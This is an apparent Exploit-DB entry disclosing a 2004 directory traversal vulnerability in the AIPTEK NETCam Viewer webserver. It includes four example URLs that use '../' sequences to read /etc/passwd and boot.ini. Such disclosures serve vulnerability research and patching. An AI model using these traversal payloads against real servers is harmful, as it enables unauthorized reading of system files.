aiptek netcam WebServer 0.93.15 - Directory Traversal

EDB-ID:

23557

CVE:





Platform:

Multiple

Date:

2004-01-20


source: https://www.securityfocus.com/bid/9456/info

It has been reported that the NETCam webserver of NETCam Viewer may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory.

AIPTEK NETCam Viewer versions 1.0.0.28 and prior are reported to be prone to this issue, however, other versions could be affected as well.

http://www.example.com/../etc/passwd
http://www.example.com/../../etc/passwd
http://www.example.com/../../../boot.ini
http://www.example.com/../../../../boot.ini